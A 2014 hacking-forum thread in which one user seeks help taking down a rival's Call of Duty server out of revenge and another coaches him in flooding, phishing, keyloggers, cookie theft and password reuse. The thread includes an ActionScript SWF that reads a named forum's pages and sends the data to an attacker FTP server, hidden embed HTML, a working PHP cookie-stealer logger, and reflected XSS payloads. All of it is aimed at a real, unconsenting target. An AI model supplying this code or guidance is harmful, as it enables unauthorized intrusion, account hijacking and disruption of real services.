Page 1 of 1

How Can I interupt or Take down a cod1/game server?

Posted: Thu Feb 06, 2014 4:20 am
by Octane
Hey guys and hi sethioz :) I sent you a msg on a social site (hopefully this is the right forum to post this in) Anyways I've been using Aluigys Q3msgboom to take down a Cod1/ United offensive server. The guys stole a server mod of mine and then called me names in his forum etc. So I decided heh why not lets play a game. I started at first by using a ingame method which by executing a file caused a server crash through a too long string bug or something. They banned me and caught me about 5 times ish. then I discovered what i call or well it was the ultimate. the q3infoboom. I dont have to be ingame to cause the server to go down. a quick hit of the button enter and walla. that was good fun, they tried banning people but in the end obviously it was not them doing it. Now they moved to a linux server and a different host. I tried doing it but it appears to have what I personally call a traffic control. instead of the program or packets running up fast. they go slow. its like stop go stop go. server only lets you draw so many queries or something from it per second? I'm not sure....

So what I'm asking. Is there anyway I could cause the server to fall on its face. there has to be more methods out there that may work for other games and such too? Disrupting the connection or getting around their somehow packet restraining...? etc?

Hell If i could even throw enough traffic at the server or do something to cause it to "time out" for a few seconds thats enough for people to quit the server thinking it crashed. but indeed its just temporarily been disrupted..... Ingame when a bad connection occurs it pops up a connection icon and well thats it lol you cant play until good connection is restored. so If you can do that here or there a bit then I'm doing what my goal is. for them to loose players lol


So let me know whatcha think. I do not know a lot in this field but where there's a will there's always a way :) Thanks for reading and your time!

Re: How Can I interupt or Take down a cod1/game server?

Posted: Thu Feb 06, 2014 4:57 am
by Octane
I dont see an edit button. To add to this It runs on the old Q3 engine, and I tried a quick LOIC attack on my own personal server but it appears to have done nothing hmm

Re: How Can I interupt or Take down a cod1/game server?

Posted: Thu Feb 06, 2014 2:04 pm
by Sethioz
umm first of, its Luigi LOL .. why does everyone think he's name is "aluigi"
anyway, yeah his tools are best bet. you can try using his TCPFP to send some packets, like join packets maybe? i don't know if server accepts them tho.

NetTools5 is good tool suite to try too, it has collection of like 200-400 tools in it, including flooders, port scanners, port connector ..etc, but it's good for finding bugs/vulnerabilities and good for flooding ..etc, it doesn't really have any exploits in it, you have to create them yourself.

in past what i've done, is taken down the whole hosting company. about 1-2 year/s ago i took down one hosting company, because they had few vulnerabilites in there. I had problem with only one server, but what do i care. hosting company had vulnerability in it and i took the whole thing down, deleted all the records and shut all the game servers down lol.

It all depends how much you wanna get them, you can do phising, keyloggers ..etc ..etc. If they have more than 1 admin/moderator, you can try and get to their system or account and fuck them up from inside out.
If they have a forum (which you said they do have), you can try cookie stealing. if you manage to get admin/moderator cookie, you can then download their database, from there you can get password hash, then crack the hash and hope they use same password on game panel / server.
I've used those methods myself and its amazing how deep the rabbit hole goes :) (what i mean, is that how many times people use same pass everywhere, i get into email, from there to another email, then another, then skype, facebook, youtube, steam ..etc ..etc) Sometimes people always use similar passwords, like "password55" and "55password" or "password1" "password2" ..etc. It isn't that hard guessing passwords really, once you get one of them.

Re: How Can I interupt or Take down a cod1/game server?

Posted: Thu Feb 06, 2014 10:00 pm
by Octane
Thanks. I'll be seeing What I can figure out and will report back :)

Re: How Can I interupt or Take down a cod1/game server?

Posted: Fri Feb 07, 2014 12:45 am
by Octane
Yeah no luck on my end.... I guess some is slightly confusing. I'm not sure which way to go about stuff. or how to even use the tools in net tools 5 for their correct purposes. i try viewing some sites but some of them seem a bit sketchy lol might even be trying to steal my cookies :(!

I do however have a website/ server and all that.... But Its just figuring out the right way to go about the cookies and or their forum. I cant really trick their member/s into clicking something. Or well actually maybe 1 or 2 but not the admins lol. I've been reading and all that but hmm just so confusing on some aspects and other aspects just wont work for me to do,Thanks

Re: How Can I interupt or Take down a cod1/game server?

Posted: Fri Feb 07, 2014 10:35 pm
by Sethioz
Forgot to mention Acunetix scanner and my favorite tools such as webscarab and paros proxy (these can help you execute the vulnerability and find your own).

Re: How Can I interupt or Take down a cod1/game server?

Posted: Sat Feb 08, 2014 9:06 am
by Octane
Thanks. Acunetix deff is cool. Of course the next big thing is learning how to find a vulnerability? hmm... I got Xenotix XSS exploit but really no idea exactly how to use that. especially on the execution end of the bargain.

So... basically I came across this https://github.com/gursev/flash-xdomain-xploit So I tried that, it should get me the cookies??? And after a bit of uh... doing stuff, And thinking it over and figuring my way out. I managed to make a SWF. then thinking how the fk do it use it? then i got thinking. the html file must be the code i also include into iguess a posting on a forum. every time somebody reads the forum thats it initiates the swf? idk... of course the html document never included anything for embedding it. so I googled to do that.

SO let me know if you think im on the right track. I put together this code to paste into a forum posting which i will list below. I also am hosting the "swf" on a free hosting site...? then trying to get it to redirect the files into my own vps of which I feel the SWF is encrypted anyways???? so for a forum that i plan on overtaking... They are complete retards I should not have to worry I'd imagine?

Code: Select all

<html>
<object type="application/x-shockwave-flash" data="fun.swf" width="1" height="1">
    <param name="movie" value="fun.swf" />
</object>
</html>

<embed src="http://hebrew123.byethost5.com/fun.swf" width="1px" height="1" />
And HERE is the code of which I used then compiled into the SWF, Id hope everything should work? but let me know what you think. hopefully the code is designed to snatch up cookies and session/data? but perhaps it does not as it might just be an example code on how to sorta exploit that crossdomain.xml , Let me know what you figure. thanks again :)

Code: Select all

//
// fun.as
// 
package {
	import flash.display.Sprite;
	import flash.events.*;
	import flash.net.URLRequestMethod;
	import flash.net.URLRequest;
	import flash.net.URLLoader;

	public class fun extends Sprite {
		public function fun() {
			// Target URL from where the data is to be retrieved
			var readFrom:String = "http://www.dutyhonorcourage.us/forum/";
			var readRequest:URLRequest = new URLRequest(readFrom);
			var getLoader:URLLoader = new URLLoader();
			getLoader.addEventListener(Event.COMPLETE, eventHandler);
			try {
				getLoader.load(readRequest);
			} catch (error:Error) {
				trace("Error loading URL: " + error);
			}
		}

		private function eventHandler(event:Event):void {
			// URL to which retrieved data is to be sent
			var sendTo:String = "ftp://login:pw@ip/folder/folder"
			var sendRequest:URLRequest = new URLRequest(sendTo);
			sendRequest.method = URLRequestMethod.POST;
			sendRequest.data = event.target.data;
			var sendLoader:URLLoader = new URLLoader();
			try {
				sendLoader.load(sendRequest);
			} catch (error:Error) {
				trace("Error loading URL: " + error);
			}
		}
	}
}

Re: How Can I interupt or Take down a cod1/game server?

Posted: Sat Feb 08, 2014 5:32 pm
by Sethioz
Cookie stealing is simple, i don't know about your code, but what you do, is point your victim, from his own website, to another website (where your cookie stealer is) and your cookie stealer gets his cookie he is using on his own website.
images and such will work, but for that victim's forum/site must allow certain code embedding.

i would simply google for cookie stealer and test it out on your own site.

I've messed with it before and got it working, i had this code under "working cookie stealer", can't remember what i did exactly tho. you still have to host this and point to it from their forum with embedded code.

Code: Select all

<?php

$cookie=$HTTP_GET_VARS["cookie"];
$data=date("I ds of F Y h:i:s A");
$user_agent=$_SERVER['HTTP_USER_AGENT'];
$file=fopen('cookies.txt','a');
fwrite($file,"DATE :$data || USER AGENT:$user_agent || cookie:$cookie\n");
fclose($file);

echo '<b>GIMME COOKIES</b></ br>
</ br>Click <a href="http://sethioz.com/">here</a> to go back to index page'

?>

Re: How Can I interupt or Take down a cod1/game server?

Posted: Mon Feb 10, 2014 4:46 am
by Octane
Hey I tried your code and modified it just so it says Error 403 cannot load page. Click here to go back to index returns you to google.

It saved a cookie file on the site problem is... i dont see anything of value in it? I was fooling around with my free hosting site so I should have a cookie or 2? idk.... heres what the file has in it I'll cross out any info I deem to hide??

Code: Select all

    DATE :0 0935 2014f February 2014 11:39:35 PM || USER AGENT:Mozilla/5.0 (Windows NT 6.3; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 || cookie:
    DATE :0 0916 2014f February 2014 11:41:16 PM || USER AGENT:Mozilla/5.0 (Windows NT 6.3; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 || cookie:
     

Re: How Can I interupt or Take down a cod1/game server?

Posted: Mon Feb 10, 2014 5:56 am
by Octane
another update. I understand it sorta better on how to use it. But some other asshats of which I dont know have been spamming their forum. He made it now that he reviews all accounts before you are allowed to post or do anything. That being Said That just made it a WHOLE lot harder :( I was like thinking YESSSSSSSS... :\ However I see now I was not getting full proper scans through acunetix. Since I was banned lol. then the site uses a anti spam verification. So new ip/s and scanning in slow bits netted me alot better of a result. Honestly I've been googling and just not finding anything at all lol theres some slight like "for educational theoretical tutorials" but I'd imagine google is now filtering out stuff. I have safe search off. What I need to find is a good kinda hidden secret hacking community.... with tuts and or guides now that would be good to find. :P

Image

and for the big attack ones. its saying

Code: Select all

Path Fragment (suffix /) input / was set to profile_943920'():;998282
The input is reflected inside <script> tag between single quotes.

Code: Select all

Path Fragment (suffix /) input / was set to profile_</script><script>prompt(935382)</script>
The input is reflected inside <script> tag between double quotes.

Re: How Can I interupt or Take down a cod1/game server?

Posted: Mon Feb 10, 2014 5:57 am
by Octane
Sorry for so many posts. I dont see a EDIT button :\

Fixing the pic i tried to link hopefully lol

Image

Re: How Can I interupt or Take down a cod1/game server?

Posted: Tue Feb 11, 2014 4:32 pm
by Sethioz
There is no EDIT button, because people kept edit-deleting their posts and that is fucking annoying, i reply and then they're like "DELETE THIS POST, problem solved" .. like WHAT?! whole idea of forum is to make it visible for others, so people can read if they have same problem.

anyway, how do you expect cookie stealer to get a cookie, if you put it onto site that does not use cookies?!
you'd have to post the evil code onto somebody's forum and go to your cookie stealer from that site. if you go to cookie stealer directly, ofcourse it has no data, because there is nothing to show.
i tested on my forum and got the cookie just fine.